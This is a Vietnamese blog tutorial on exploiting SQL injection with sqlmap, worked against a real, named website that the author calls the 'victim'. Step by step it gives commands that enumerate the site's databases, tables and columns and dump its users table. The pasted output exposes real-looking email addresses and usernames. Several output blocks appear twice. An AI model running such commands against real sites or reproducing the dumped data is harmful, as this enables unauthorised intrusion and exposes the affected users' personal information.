[ SQL ] HƯỚNG DẪN KHAI THÁC SQL INJECTION BẰNG SQLMAP
- Công cụ: Python + Sqlmap ( các bạn có thể download trên Google )
Bắt đầu nhé :v
Chạy lênh : sqlmap.py -u http://www.calidus.ro/en/news.php?id=2 –dbs
Trong đó :
u : đường dẫn url của victim ( ở đây là victim của mình là http://www.calidus.ro/en/news.php?id=2
dbs: lệnh này liệt kê databases của victim
Sau khi thực hiện lệnh trên thì nó sẽ ra databases như sau :
[*] caliduzb_calidussql
[*] information_schema
[*] information_schema
Ta đã có databases là caliduzb_calidussql :v
Tiếp theo mình sẽ get tables của nó
Ta dùng lệnh : sqlmap.py -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql –tables
D : là tên databases
tables : là tables cái này nhìn cũng biết :3
Khi chạy lệnh trên sẽ ra như thế này
Database: caliduzb_calidussq
[50 tables]
+——————-+
| about |
| about_de |
| about_en |
| categories |
| categories_de |
| categories_en |
| contact |
| contact_de |
| contact_en |
| customers |
| eco |
| eco_de |
| eco_en |
…
Thế là ra các tables của nó rồi :3
[50 tables]
+——————-+
| about |
| about_de |
| about_en |
| categories |
| categories_de |
| categories_en |
| contact |
| contact_de |
| contact_en |
| customers |
| eco |
| eco_de |
| eco_en |
…
Thế là ra các tables của nó rồi :3
Giờ thấy côt nào mà mình thích get ra , ở đây mình get cột users
Mình sẽ dùng lệnh :sqlmap.py -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users –columns
Nó sẽ ra thế này :
Table: users
[11 columns]
+———————–+————–+
| Column | Type |
+———————–+————–+
| logcode | varchar(100) |
| user_email | varchar(100) |
| user_id | mediumint(8) |
| user_last_confirm_key | varchar(40) |
| user_lastvisit | date |
| user_new_privmsg | tinyint(2) |
| user_password | varchar(40) |
| user_regdate | date |
| user_type | tinyint(2) |
| username | varchar(255) |
| username_clean | varchar(255) |
+———————–+————–+
[11 columns]
+———————–+————–+
| Column | Type |
+———————–+————–+
| logcode | varchar(100) |
| user_email | varchar(100) |
| user_id | mediumint(8) |
| user_last_confirm_key | varchar(40) |
| user_lastvisit | date |
| user_new_privmsg | tinyint(2) |
| user_password | varchar(40) |
| user_regdate | date |
| user_type | tinyint(2) |
| username | varchar(255) |
| username_clean | varchar(255) |
+———————–+————–+
( Làm biếng chụp hình )
Sau đó ta sẽ get những cột mình cần , mình sẽ get cột user_email và cột username
Mình sẽ dùng lệnh : sqlmap.py -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_email,username –dump
Nó sẽ ra thế này :
Database: caliduzb_calidussql
Table: users
[3 entries]
+————————————-+———-+
| user_email | username |
+————————————-+———-+
| milad.mostavi@computer-solutions.ro | dexmod |
| darkn3ss_ro@yahoo.com | miladro |
+————————————-+———-+
Table: users
[3 entries]
+————————————-+———-+
| user_email | username |
+————————————-+———-+
| milad.mostavi@computer-solutions.ro | dexmod |
| darkn3ss_ro@yahoo.com | miladro |
+————————————-+———-+
End.
[ SQL ] HƯỚNG DẪN KHAI THÁC SQL INJECTION BẰNG SQLMAP
Reviewed by Unknown
on
17:40
Rating:
Reviewed by Unknown
on
17:40
Rating:
Không có nhận xét nào: